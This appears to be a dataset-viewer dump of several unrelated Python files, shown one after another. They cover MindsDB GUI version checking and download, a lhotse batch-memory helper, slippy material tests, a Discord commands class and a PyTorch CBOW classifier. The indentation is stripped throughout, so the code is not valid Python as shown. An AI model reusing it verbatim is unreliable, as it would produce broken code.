max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destignation, version):
if isinstance(destignation, str):
destignation = Path(destignation)
log = get_log('http')
dist_zip_path = str(destignation.joinpath('dist.zip'))
bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
resources = [{
'url': bucket + 'dist-V' + version + '.zip',
'path': dist_zip_path
}]
def get_resources(resource):
response = requests.get(resource['url'])
if response.status_code != requests.status_codes.codes.ok:
raise Exception(f"Error {response.status_code} GET {resource['url']}")
open(resource['path'], 'wb').write(response.content)
try:
for r in resources:
get_resources(r)
except Exception as e:
log.error(f'Error during downloading files from s3: {e}')
return False
static_folder = destignation
static_folder.mkdir(mode=0o777, exist_ok=True, parents=True)
ZipFile(dist_zip_path).extractall(static_folder)
if static_folder.joinpath('dist').is_dir():
shutil.move(str(destignation.joinpath('dist').joinpath('index.html')), static_folder)
shutil.move(str(destignation.joinpath('dist').joinpath('assets')), static_folder)
shutil.rmtree(destignation.joinpath('dist'))
os.remove(dist_zip_path)
version_txt_path = destignation.joinpath('version.txt') # os.path.join(destignation, 'version.txt')
with open(version_txt_path, 'wt') as f:
f.write(version)
return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
''' Update Scout files basing on compatible-config.json content.
Files will be downloaded and updated if new version of GUI > current.
Current GUI version stored in static/version.txt.
'''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???)
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
# NOTE rewrite it, that hotfix to see GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_integration_controller = IntegrationController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
|
17269
|
import warnings
from typing import Dict, Tuple
from lhotse import CutSet
from lhotse.dataset.sampling.base import CutSampler
def find_pessimistic_batches(
sampler: CutSampler, batch_tuple_index: int = 0
) -> Tuple[Dict[str, CutSet], Dict[str, float]]:
"""
Function for finding 'pessimistic' batches, i.e. batches that have the highest potential
to blow up the GPU memory during training. We will fully iterate the sampler and record
the most risky batches under several criteria:
- single longest cut
- single longest supervision
- largest batch cuts duration
- largest batch supervisions duration
- max num cuts
- max num supervisions
.. note: It is up to the users to convert the sampled CutSets into actual batches and test them
by running forward and backward passes with their model.
Example of how this function can be used with a PyTorch model
and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`::
sampler = SingleCutSampler(cuts, max_duration=300)
dataset = K2SpeechRecognitionDataset()
batches, scores = find_pessimistic_batches(sampler)
for reason, cuts in batches.items():
try:
batch = dset[cuts]
outputs = model(batch)
loss = loss_fn(outputs)
loss.backward()
except:
print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}")
raise
:param sampler: An instance of a Lhotse :class:`.CutSampler`.
:param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`.
Indicates which position in the tuple we should look up for the CutSet.
:return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.:
``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})``
"""
criteria = {
"single_longest_cut": lambda cuts: max(c.duration for c in cuts),
"single_longest_supervision": lambda cuts: max(
sum(s.duration for s in c.supervisions) for c in cuts
),
"largest_batch_cuts_duration": lambda cuts: sum(c.duration for c in cuts),
"largest_batch_supervisions_duration": lambda cuts: sum(
s.duration for c in cuts for s in c.supervisions
),
"max_num_cuts": len,
"max_num_supervisions": lambda cuts: sum(
1 for c in cuts for _ in c.supervisions
),
}
try:
sampler = iter(sampler)
first_batch = next(sampler)
if isinstance(first_batch, tuple):
first_batch = first_batch[batch_tuple_index]
except StopIteration:
warnings.warn("Empty sampler encountered in find_pessimistic_batches()")
return {}, {}
top_batches = {k: first_batch for k in criteria}
top_values = {k: fn(first_batch) for k, fn in criteria.items()}
for batch in sampler:
if isinstance(batch, tuple):
batch = batch[batch_tuple_index]
for crit, fn in criteria.items():
val = fn(batch)
if val > top_values[crit]:
top_values[crit] = val
top_batches[crit] = batch
return top_batches, top_values
|
17278
|
import numpy as np
import numpy.testing as npt
import slippy
import slippy.core as core
"""
If you add a material you need to add the properties that it will be tested with to the material_parameters dict,
the key should be the name of the class (what ever it is declared as after the class key word).
The value should be a tuple of dicts:
The first dict in the tuple will be unpacked to instantiate the class,
The second will be used with the displacement from loads method
The third will be used with the loads from displacement method to ensure that the methods are inverses of each other
If there is a limit the applicability of the displacements from loads method (such as for a perfectly plastic material
the _max_load key word should be set in the second dict.
For more complex behaviour please also implement your own tests
"""
material_parameters = {
'Elastic': ({'name': 'steel_5', 'properties': {'E': 200e9, 'v': 0.3}},
{'grid_spacing': 0.01, 'simple': True},
{'grid_spacing': 0.01, 'simple': True, 'tol': 1e-9}),
'Rigid': ({}, {}, {})
}
exceptions = [core.Rigid]
def test_materials_basic():
# check that one of influence matrix or displacement from loading is given
for material in core.materials._IMMaterial._subclass_registry:
if material in exceptions:
continue
try:
mat_params = material_parameters[material.material_type]
except KeyError:
raise AssertionError(f"Material test parameters are not specified, for material {material.material_type}")
mat_instance = material(**mat_params[0])
max_load = mat_params[1].pop('_max_load', 1)
np.random.seed(0)
loads = np.random.rand(16, 16) * max_load
# check that the loads and displacement functions are inverse of each other
for direction in {'x', 'y', 'z'}:
load_in_direction = {direction: loads}
displacement = mat_instance.displacement_from_surface_loads(load_in_direction, **mat_params[1])
set_disp = displacement[direction]
loads_calc = mat_instance.loads_from_surface_displacement(displacements={direction: set_disp},
**mat_params[2])
npt.assert_allclose(loads, slippy.asnumpy(loads_calc[direction]), atol=max_load * 0.02)
def test_elastic_coupled():
mat = core.Elastic('steel_6', {'E': 200e9, 'v': 0.3})
np.random.seed(0)
loads1 = np.random.rand(16, 16)
loads2 = np.random.rand(16, 16)
directions = 'xyzx'
for i in range(3):
dir_1 = directions[i]
dir_2 = directions[i+1]
loads_in_direction = {dir_1: loads1, dir_2: loads2}
displacement = mat.displacement_from_surface_loads(loads_in_direction, grid_spacing=0.01, simple=True)
loads_calc = mat.loads_from_surface_displacement(displacements=displacement,
grid_spacing=0.01, simple=True)
for direction in [dir_1, dir_2]:
npt.assert_allclose(loads_in_direction[direction], slippy.asnumpy(loads_calc[direction]), atol=0.02)
displacement = mat.displacement_from_surface_loads(loads_in_direction, grid_spacing=0.01, simple=False)
loads_calc = mat.loads_from_surface_displacement(displacements=displacement,
grid_spacing=0.01, simple=False)
for direction in [dir_1, dir_2]:
npt.assert_allclose(loads_in_direction[direction], slippy.asnumpy(loads_calc[direction]), atol=0.02)
|
17306
|
from .command import Command, ApiCommand
class Application:
def __init__(self, client):
self.client = client
self.http = client.http
self.__commands = []
async def fetch_commands(self) -> List[ApiCommand]:
"""
This can fetch discord application commands from discord api.
Returns
-------
List[Command] : list of command.
"""
datas = await self.http.fetch_commands()
return [ApiCommand.from_dict(self, data) for data in datas]
def _check_command(self, command, api):
if command.description != api.description:
return True
else:
return False
async def setup_command(self) -> None:
"""
set up a application command.
"""
apis = await self.fetch_commands()
cmds = []
for command in self.__commands:
cmds.append(command.name)
update = False
for api in apis:
if api.name in cmds:
if api.name == command.name:
break
else:
await api.delete()
else:
update = True
if update:
data = await self.http.add_command(command)
def add_command(self, command:Command) -> None:
"""
This can add discord application commannd.
Examples
--------
```python
from discord_api import Client, Command
client = Client()
client.add_command(Command(name = "ping", description = "pong"))
client.run("ToKeN")
```
"""
self.__commands.append(command)
|
17335
|
import torch
from torch import nn
class CBOWClassifier(nn.Module):
"""
Continuous bag of words classifier.
"""
def __init__(self, hidden_size, input_size, max_pool, dropout=0.5):
"""
:param hidden_size:
:param input_size:
:param max_pool: if true then max pool over word embeddings,
else sum word embeddings
"""
super(CBOWClassifier, self).__init__()
self.hidden_size = hidden_size
self.input_size = input_size
self.max_pool = max_pool
self.dropout = nn.Dropout(p=dropout)
self.i2h = nn.Linear(self.input_size, self.hidden_size)
self.h2o = nn.Linear(self.hidden_size, 1)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
if self.max_pool:
encoding = nn.functional.max_pool1d(x.transpose(1, 2),
x.shape[1])
encoding = encoding.transpose(1, 2).squeeze()
else:
encoding = x.sum(1)
encoding = self.dropout(encoding)
hidden = self.tanh(self.dropout(self.i2h(encoding)))
out = self.sigmoid(self.h2o(hidden))
return out
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.